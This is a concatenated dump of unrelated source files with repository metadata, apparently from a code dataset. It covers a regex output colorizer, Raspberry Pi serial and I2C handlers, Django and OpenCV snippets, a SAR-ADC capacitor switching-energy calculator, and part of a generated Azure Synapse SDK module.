# Tool to colorize output based on regular expressions, designed to work both
# with ANSI escape sequences and with HTML color codes. Data to colorize is input
# on STDIN, and result is output on STDOUT
# Usage:
# colorize <ansi|html> <color config filename>
import sys
import re
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<"
}
def htmlEscape(text):
"""Produce entities within text."""
try:
result = '"".join(html_escape_table.get(c,c) for c in text)'
except SyntaxError:
print "HTML mode not supported prior to Python 2.4"
sys.exit(1)
return result
def printHtmlHeader():
print '''
<html>
<head>
<style text="text/css">
body {
font-family: Monaco,
"Bitstream Vera Sans Mono",
"Lucida Console",
Terminal,
monospace;
font-size: 14;
}
</style>
</head>
<body>
<pre>'''
def printHtmlFooter():
print '''
</pre>
</body>
</html>
'''
escape = '\033'
colors = {'black': {'ansi': {'begin': escape + '[0;30m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'black\'>', 'end': '</font>'}},
'red': {'ansi': {'begin': escape + '[0;31m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'red\'>', 'end': '</font>'}},
'green': {'ansi': {'begin': escape + '[0;32m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'green\'>', 'end': '</font>'}},
'yellow': {'ansi': {'begin': escape + '[0;33m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'#C9960C\'>', 'end': '</font>'}},
'blue': {'ansi': {'begin': escape + '[0;34m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'blue\'>', 'end': '</font>'}},
'purple': {'ansi': {'begin': escape + '[0;35m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'purple\'>', 'end': '</font>'}},
'cyan': {'ansi': {'begin': escape + '[0;36m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'cyan\'>', 'end': '</font>'}},
'white': {'ansi': {'begin': escape + '[0;37m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'white\'>', 'end': '</font>'}}}
if sys.argv[1] in ('html', 'ansi'):
format = sys.argv[1]
else:
sys.exit(-1)
rules = {}
# Read color regular expressions
configFile = open(sys.argv[2])
for line in configFile:
if line[0] == '#':
continue
# Read each line - first word is colour ID, rest of line is regular expression
color, regex = line.strip().split(None, 1)
rules[regex] = color
configFile.close()
if format == 'html':
printHtmlHeader()
for line in sys.stdin:
# Clean up Unicode characters
line = line.replace('\xe2\x80\x98', "'").replace('\xe2\x80\x99',"'")
for regex, color in rules.items():
if re.search(regex, line):
if format == 'html':
line = htmlEscape(line)
print colors[color][format]['begin'] + line.strip() + colors[color][format]['end']
break
else:
if format == 'html':
line = htmlEscape(line)
print line.strip()
if format == 'html':
printHtmlFooter()
|
[
"noreply@github.com"
] |
cheshirex.noreply@github.com
|
|
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
|
a51854991671a4389902945578288da34845f8d9
|
/libs/Utility/__init__.py
|
413df21a5385589d95b5c2ec9bf735a694a5e504
|
[] |
no_license
|
wuyou1102/DFM_B2
|
9210b4b8d47977c50d92ea77791f477fa77e5f83
|
69ace461b9b1b18a2269568110cb324c04ad4266
|
refs/heads/master
| 2020-04-13T18:54:20.045734
| 2019-06-17T12:46:23
| 2019-06-17T12:46:23
| 163,387,873
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 297
|
py
|
# -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial
|
[
"jotey@qq.com"
] |
jotey@qq.com
|
fa4752f737897f35e16ed0b252a1230746f6ee6d
|
7ff3ec2f2a6e093a63f09a30ec985c3564c79159
|
/Demo_2/Raspberry_Pi/Threading/Pi_Comms_Multi_Threading.py
|
7b0e7ee2d2290889fa410ff3a3ec584c98dfcb2e
|
[] |
no_license
|
lkseattle/SEED_FALL_2020_T3-1
|
468dafe4193a6663d5dc6fa09ea7cfc9953f4455
|
b7e026fee1d6f77f62fd84547beebac3b76c2532
|
refs/heads/master
| 2023-01-10T21:47:24.578863
| 2020-11-10T09:34:58
| 2020-11-10T09:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,016
|
py
|
#Cameron Kramr
#10/09/2020
#EENG 350
#Section A
#Computer Vision
#NOTE, this module requires pygame to be installed in order to run
#The code in this file deals with communcicating with other devices outside of the raspberry pi.
import multiprocessing as mp
import termios
import os
import sys
from enum import Enum
from enum import IntEnum
import time
import serial
import board
import busio
import adafruit_character_lcd.character_lcd_rgb_i2c as character_lcd
from smbus2 import SMBus
import math
import ctypes
#import spidev
#Create the valid commands for controlling thread operation
class I2C_CMD(IntEnum):
LCD_CLR_MSG = 1
WRITE_ARDU = 2
FETCH_ANGLE = 3
class ARDU_CMD(IntEnum):
TARGET = 250
SEND = 1
RECEIVE = 2
#Main Serial handler thread deals with Serial nonsense.
def Serial_Handler(input_pipe, file = '/dev/ttyACM0', baud = 250000):
#Initialize Serial object
ser = serial.Serial(file, baud)
FPS = 100
data2 = ""
Start = time.time()
#time.sleep(2) #might need it so 'ser' can work properly
#Initialize variables
data = [0,0,0]
while (True):
#Data shape:
#[command, [magnitude, angle]]
#Non-blocking read of pipe waiting for input
try:
if(input_pipe.poll()):
data = input_pipe.recv()
while(ser.inWaiting()>0):
data2 += ser.readline().decode('utf-8')
#print("Arduino Data:")
#print(data2)
except:
print("Serial Error")
#print("Looping")
if(data[0] == ARDU_CMD.SEND): #Clear LCD and send it a string to display
try:
#ser.write((' '.join([str(item) for item in data[1]]
for i in data[1]:
if(i != '\n'):
ser.write(i.encode())
#print(i)
#print("Sent Ardu:" + str(data[1]))
#pass
except:
print("Something's wrong with sending Serial Data!")
if(data2 != ""): #if we need to get the position from arduino, this if statement
#will do it. Feel free to alter "get_position" to whatever you want.
try:
#data2 = ser.readline().decode('utf-8').rstrip() #gets data from arduino
input_pipe.send(data2)
data2 = ""
pass
except:
print("Something's wrong with getting Serial Data!")
#Clear data
data[0] = 0
#Frame lock arduino
while(time.time() - Start < 1/FPS):
pass
#Main I2C handler thread deals with I2C nonsense.
def I2C_Handler(input_pipe, size, address, color = [255, 0, 0]):
#Initialize I2C objects
i2c_bus = busio.I2C(board.SCL, board.SDA)
lcd = character_lcd.Character_LCD_RGB_I2C(i2c_bus, size[1], size[0])
lcd.clear()
#Initialize SMbus object
sm_bus = SMBus(1)
#Initialize variables
I2C_FPS = 100 #Frame rate control for thread to conserve resources
I2C_Start = 0
data = [0,0]
data_in = ctypes.c_int8
#Initialize LCD screen
lcd.clear()
lcd.color = color
lcd.message = "Init LCD Handler Done ;)"
while(True):
#Record time
I2C_Start = time.time()
#Data shape:
#[cmd, content]
#Non-blocking read of pipe waiting for input
if(input_pipe.poll()):
data = input_pipe.recv()
#Switch on command portion of data to figure out what to do
if(data[0] == I2C_CMD.LCD_CLR_MSG): #Clear LCD and send it a string to display
try:
#time.sleep(0.1)
lcd.clear()
lcd.message = str(data[1])
pass
except:
print("SM Bus Error!")
elif(data[0] == I2C_CMD.WRITE_ARDU): #Write to the arduino #not needed anymore?
try:
print(data[1])
sm_bus.write_byte_data(address, 0, int(data[1]))
except:
print("SM Bus Error!")
sm_bus = SMBus(1)
elif(data[0] == I2C_CMD.FETCH_ANGLE): #Fetch the angle from the arduino #not needed anymore?
#print(sm_bus.read_byte_data(address, 0))
try:
#Need to preserve the sign to make this sensible, use ctypes for that
data_in = ctypes.c_int8(sm_bus.read_byte_data(address, 0))
#Convert data in from byte to degree angle
data_in = data_in.value/128*180
#Send angle down pipe
input_pipe.send(data_in)
except:
print("SM Bus Error!")
#Clear data
data[0] = 0
#print("Sleep Time: " + str(max(1/I2C_FPS - (time.time() - I2C_Start),0)))
#Frame lock the thread to preserve resources
time.sleep(max(1/I2C_FPS - (time.time() - I2C_Start),0))
#print("I2C_FPS: " + str(int(1/(time.time() - I2C_Start))))
if __name__== "__main__":
Serial_pipe_1, Serial_pipe_2 = mp.Pipe(duplex = True)
comms = mp.Process(target = Serial_Handler, args=(Serial_pipe_2,))
comms.start()
Serial_pipe_1.send([ARDU_CMD.SEND, 123,456])
Serial_pipe_1.send([ARDU_CMD.SEND, 456,123])
Serial_pipe_1.send([ARDU_CMD.SEND, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
choar = input()
|
[
"cameronkramr@mines.edu"
] |
cameronkramr@mines.edu
|
b9f5b0e85ced88524ab8f2e59229df6b0f93c821
|
e60a342f322273d3db5f4ab66f0e1ffffe39de29
|
/parts/zodiac/chameleon/__init__.py
|
60fbbb344ac3c226ff2ca2148893e72d3fc26add
|
[] |
no_license
|
Xoting/GAExotZodiac
|
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
|
f60b2b77b47f6181752a98399f6724b1cb47ddaf
|
refs/heads/master
| 2021-01-15T21:45:20.494358
| 2014-01-13T15:29:22
| 2014-01-13T15:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 75
|
py
|
/home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py
|
[
"alex.palacioslopez@gmail.com"
] |
alex.palacioslopez@gmail.com
|
580dbd15bf43272f28e3f9bd42413a905510cd76
|
bef304291f5fe599f7a5b713d19544dc0cecd914
|
/todoapp/todo_list/forms.py
|
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
|
[] |
no_license
|
coderj001/django-todo-and-air-quality
|
9ca847143ea86677a0d54026c060638fabf8c042
|
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
|
refs/heads/master
| 2020-12-14T20:20:49.845722
| 2020-01-19T15:06:42
| 2020-01-19T15:06:42
| 234,855,834
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
class Meta:
model=ToDoList
fields=['item','completed']
|
[
"amirajubolchi001@gmail.com"
] |
amirajubolchi001@gmail.com
|
d57c68ff01ec5c6b974091d91da38f8ac7708ec3
|
26371093460ea3026cdcd74e624b0c2d4b1d5892
|
/Staff.py
|
2fae3241689d94a0185840d38b2a6b21e9b9a6a3
|
[] |
no_license
|
meyerkeaton/ktmcbk
|
0b636b1bc8e8be022f6423d88776191a606949c7
|
5bca15495ee1066658c59ae24c15be4028f8a4ff
|
refs/heads/main
| 2022-12-28T05:41:09.453076
| 2020-10-15T05:09:20
| 2020-10-15T05:09:20
| 304,215,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 883
|
py
|
import json
import User
class Staff(User.User):
def update_course_db(self):
with open('Data/courses.json', 'w') as fp:
json.dump(self.all_courses, fp)
def create_assignment(self,assignment_name, due_date, course):
assignment = {
assignment_name: {
'due_date': due_date
}
}
self.all_courses[course]['assignments'].update(assignment)
self.update_course_db()
def change_grade(self,user,course,assignment,grade):
self.users[user]['courses'][course][assignment]['grade'] = 0
self.update_user_db()
def check_grades(self,name,course):
assignments = self.users[name]['courses'][course]
grades = []
for key in assignments:
grades.append([key, assignments[key]['grade']])
return grades
|
[
"noreply@github.com"
] |
meyerkeaton.noreply@github.com
|
6b2843c0a678ffe8be10b0d147adee1740dc58da
|
a5f8eb72e680a906f74ae53d2b6428fbb008320c
|
/31-zip.py
|
a48620bb23a58f1ecfdebf53d239f9cf71d077e5
|
[] |
no_license
|
arn1992/Basic-Python
|
0588858aed632ac9e65e5618d5b57bcbe71c45bc
|
09b9bf2364ddd2341f95445e18868e2e0904604d
|
refs/heads/master
| 2020-06-28T18:35:32.394730
| 2016-12-15T07:21:33
| 2016-12-15T07:21:33
| 74,483,622
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
first=['ratul','aminur','arn']
last=['tasneem','ishrar']
names=zip(first,last)
for a,b in names:
print(a,b)
|
[
"noreply@github.com"
] |
arn1992.noreply@github.com
|
91f2e963910d164e1fa3ecf41f3875ae6dd1b8e6
|
4fc5c908df8c0aecb4943e798c9c71c542a96584
|
/samples/practice1_Milana.py
|
3d038dea120dcb17d2a350f9b410f72a73b176fa
|
[
"Apache-2.0"
] |
permissive
|
Milana009/UNN_HPC_SCHOOL_2019_ML
|
84d51cdd7a499139a0297a76522350de74b7ff4c
|
d5bb7a8ab5f026f2bc4df896019ded5987040295
|
refs/heads/master
| 2020-09-13T07:58:32.456350
| 2019-11-19T23:04:02
| 2019-11-19T23:04:02
| 222,703,246
| 1
| 0
|
Apache-2.0
| 2019-11-19T13:31:23
| 2019-11-19T13:31:22
| null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
import sys
import cv2
import logging as log
import argparse
sys.path.append('../src')
from imagefilter import ImageFilter
def build_argparse():
parser=argparse.ArgumentParser()
parser.add_argument('-i', '--input', help = 'your input', type = str)
parser.add_argument('-w', '--width', help = 'your width', type = int)
parser.add_argument('-l', '--height', help = 'your height', type = int)
#
# Add your code here
#
return parser
def main():
log.basicConfig(format="[ %(levelname)s ] %(message)s", level=log.INFO, stream=sys.stdout)
log.info("Hello image filtering")
args = build_argparse().parse_args()
imagePath = args.input
log.info(imagePath)
image_source = cv2.imread(imagePath, 1)
log.info(image_source.shape)
myFilter = ImageFilter(gray = True, shape = (args.width, args.height))
image_final = myFilter.process_image(image_source)
cv2.imshow("Image", image_final)
cv2.waitKey(0)
cv2.destroyAllWindows()
#
# Add your code here
#
return
if __name__ == '__main__':
sys.exit(main())
|
[
"Milana_Vagapova"
] |
Milana_Vagapova
|
9b500090e5537a2b729caa78d0590d8753bbca89
|
b92adbd59161b701be466b3dbeab34e2b2aaf488
|
/.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py
|
34ca1ee1bb0f47da7e80c5643b393f16129c97b8
|
[] |
no_license
|
R151865/cloud_9_files
|
7486fede7af4db4572f1b8033990a0f07f8749e8
|
a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4
|
refs/heads/master
| 2022-11-22T10:45:39.439033
| 2020-07-23T09:31:52
| 2020-07-23T09:31:52
| 281,904,416
| 0
| 1
| null | 2022-11-20T00:47:10
| 2020-07-23T09:08:48
|
Python
|
UTF-8
|
Python
| false
| false
| 480
|
py
|
{"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"}
|
[
"r151865@rguktrkv.ac.in"
] |
r151865@rguktrkv.ac.in
|
d8aac991213a5218618098233100d5a23603c036
|
9d48dc6e54f959285ed3ab15006d664d42db7c01
|
/assistant_module/get_energy.py
|
17e7b4311937c5f4041a66ce17b38da77f929ad5
|
[] |
no_license
|
sandylaker/saradc_toolbox
|
d971936ec5b13fb467f991b351b30fccad00876a
|
b7b8f3d6c15a7c522cd89267739318c78e4d6a37
|
refs/heads/master
| 2020-03-27T11:42:29.520183
| 2018-09-15T21:03:47
| 2018-09-15T21:03:47
| 146,503,308
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,098
|
py
|
import numpy as np
from assistant_module.get_decision_path import get_decision_path
def get_energy(n, switch='conventional', structure='conventional'):
"""
get the energy consumption of every code, each code represents the possible decision level before the last
decision(a odd decimal integer).
:param n: resolution of DAC
:param switch: switching method: 'conventional': conventional one-step switching
'monotonic': monotonic capacitor switching, in each transition step, only one
capacitor in one side is switched.
'mcs': merged capacitor switching
'split': split-capacitor method. The MSB capacitor is split into a copy of the
rest of the capacitor array. When down-switching occurs, only the
corresponding capacitor in the sub-capacitor array is discharged to the
ground
:param structure: structure of ADC: 'conventional': conventional single-ended structure
'differential': has two arrays of capacitors, the switch states of positive and
negative side are complementary. The energy consumption is two
times of that in the conventional structure, if conventional
switching method is used.
:return: a ndarray, each element represents the energy consumption of each code.
"""
# possible decision level before the last comparision
code_decimal = np.arange(1, 2 ** n, 2)
decision_path = get_decision_path(n) # two-dimensional
# store the switching energy of each code
sw_energy_sum = np.zeros(len(code_decimal))
if switch == 'conventional':
coefficient = 1
if structure == 'differential':
# the switching states of both sides are complementary, so that the energy consumption is two times of
# that in conventional(single-ended) structure.
coefficient = 2
for i in range(len(code_decimal)):
# weight of each decision threshold layer
weights_ideal = [0.5 ** (i + 1) for i in range(n)]
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# calculate the energy for up-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_up_pos: ',sw_up_pos)
if not sw_up_pos.size == 0:
# sw_energy[sw_up_pos] = decision_path[i,sw_up_pos]*(-1)*(weights_ideal[sw_up_pos])+ 2**(n-1-sw_up_pos)
# 2**(n-1-sw_up_pos) stands for E_sw = C_up*V_ref^2
for k in sw_up_pos:
# \delta V_x is positive,so *(-1)
sw_energy[k] = decision_path[i, k] * \
(-1) * (weights_ideal[k]) + 2**(n - 1 - k)
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_dn_pos: ',sw_dn_pos)
if not sw_dn_pos.size == 0:
# sw_energy[sw_dn_pos] = decision_path[i,sw_dn_pos]*(-1)*(weights_ideal[sw_dn_pos]) + 2**(n-1-sw_dn_pos)
for k in sw_dn_pos:
sw_energy[k] = decision_path[i, k] * \
(weights_ideal[k]) + 2**(n - 1 - k)
# print(code_decimal[i],': ',sw_energy)
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
if switch == 'monotonic':
if structure == 'conventional':
raise Exception(
'Conventional(single-ended) structure does not support monotonic switching.')
for i in range(len(code_decimal)):
# the total capacitance of positive and negative sides
c_tp = c_tn = 2 ** (n - 1)
# vx unchanged in the first step
weights_ideal = np.concatenate(
([0], [0.5 ** j for j in range(1, n)]))
sw_energy = np.zeros(n)
sw_energy[0] = 0
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1, 0
for k in range(1, n):
# if up-switching occurs, a capacitor of the p-side will be connected to the ground while n-side remains
# unchanged; if down-switching occurs, a capacitor of n -side will be connected to the ground while
# p-side remains unchanged. Attention: here is the range(1,n), when k starts from 1, the first
# capacitor switched to the ground is 2**(n-2)*C0 ( the MSB capacitor differs from which in the
# conventional case.
c_tp = c_tp - 2**(n - 1 - k) * sw_process[k]
c_tn = c_tn - 2**(n - 1 - k) * (1 - sw_process[k])
sw_energy[k] = c_tp * (-1) * (- weights_ideal[k]) * sw_process[k] + \
c_tn * (-1) * (- weights_ideal[k]) * (1 - sw_process[k])
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'mcs':
if structure == 'conventional':
raise Exception(
'Conventional(single-ended) structure does not support monotonic switching.')
weights_ideal = np.concatenate(
([0.5 ** j for j in range(1, n)], [0.5 ** (n - 1)]))
cap_ideal = np.concatenate(
([2 ** (n - 2 - j) for j in range(n - 1)], [1]))
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# connection of bottom plates of positive and negative capacitor arrays.
# at the sampling phase, all the bottom plates are connected to Vcm
# = 0.5* Vref
cap_connect_p = np.full((n, n), 0.5)
cap_connect_n = np.full((n, n), 0.5)
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the v_x of both sides in each step, here the term v_ip and
# v_in are subtracted.
v_xp = np.zeros(n)
v_xn = np.zeros(n)
# store the voltage difference between the plates of each capacitor in each step, here the term v_ip- v_cm
# and v_in - v_cm are subtracted, because when calculating the change of v_cap, these terms are constant and
# so eliminated.
v_cap_p = np.zeros((n, n))
v_cap_n = np.zeros((n, n))
for k in range(1, n):
# update the connections of bottom plates
cap_connect_p[k:, k - 1], cap_connect_n[k:,
k - 1] = 1 - sw_process[k], sw_process[k]
v_xp[k] = np.inner(cap_connect_p[k], weights_ideal)
v_xn[k] = np.inner(cap_connect_n[k], weights_ideal)
# calculate the voltage across the top and bottom plates of
# capacitors
v_cap_p[k] = v_xp[k] - cap_connect_p[k]
v_cap_n[k] = v_xn[k] - cap_connect_n[k]
# find index of the capacitors connected to the reference
# voltage
c_tp_index = np.where(cap_connect_p[k] == 1.0)[0]
c_tn_index = np.where(cap_connect_n[k] == 1.0)[0]
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
sw_energy_p = - \
np.inner(cap_ideal[c_tp_index], (v_cap_p[k, c_tp_index] - v_cap_p[k - 1, c_tp_index]))
sw_energy_n = - \
np.inner(cap_ideal[c_tn_index], (v_cap_n[k, c_tn_index] - v_cap_n[k - 1, c_tn_index]))
sw_energy[k] = sw_energy_p + sw_energy_n
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'split':
coefficient = 1
if structure == 'differential':
coefficient = 2
if n < 2:
raise Exception(
"Number of bits must be greater than or equal to 2. ")
# capacitor array, cap_ideal has the shape of (2,n), in which the first row is the sub-capacitor array of the
# MSB capacitor, the second row is the main capacitor array(excluding
# the MSB capacitor)
cap_ideal = np.repeat(np.concatenate(
([2**(n - 2 - i) for i in range(n - 1)], [1]))[np.newaxis, :], 2, axis=0)
weights_ideal = cap_ideal / (2**n)
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the bottom plates connection in each step
cap_connect = np.repeat(
np.vstack(
(np.ones(n), np.zeros(n)))[
np.newaxis, :, :], n, axis=0)
# store the voltage at X point ,here the term v_cm - v_in is
# subtracted
v_x = np.zeros(n)
v_x[0] = np.sum(np.multiply(weights_ideal, cap_connect[0]))
# the voltage between top plates and bottom plates
v_cap = np.zeros((n, 2, n))
v_cap[0] = v_x[0] - cap_connect[0]
for k in range(1, n):
# if up-switching: the capacitor with index k-1 in the main capacitor array will be charged to V_ref,
# and the capacitor with same index remains charged to V_ref; if down-switching: the capacitor
# with index k-1 in the sub-capacitor array will be discharged to ground, and the capacitor with the
# same index remains discharged.
cap_connect[k:, :, k - 1] = sw_process[k]
v_x[k] = np.sum(np.multiply(weights_ideal, cap_connect[k]))
v_cap[k] = v_x[k] - cap_connect[k]
# find index of the capacitors charged to the reference
# voltage
c_t_index = np.where(
cap_connect[k] == 1.0) # 2-dimensional index
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
# attention that v_cap is 3d-array, the the slicing index
# should also be 3-dimensional
sw_energy[k] = - np.inner(cap_ideal[c_t_index],
(v_cap[k,c_t_index[0],
c_t_index[-1]] - v_cap[k - 1, c_t_index[0], c_t_index[-1]]))
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
|
[
"lfc199471@gmail.com"
] |
lfc199471@gmail.com
|
90352a180e75d18219b8cba394d4d2b8f03de187
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py
|
9d5b1194a4b1cae79ac490bbe3402239b826e729
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 33,298
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.polling.base_polling import LROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations")
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_spark_configuration_request(
spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_match is not None:
_headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str")
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_spark_configuration_request(
spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_none_match is not None:
_headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
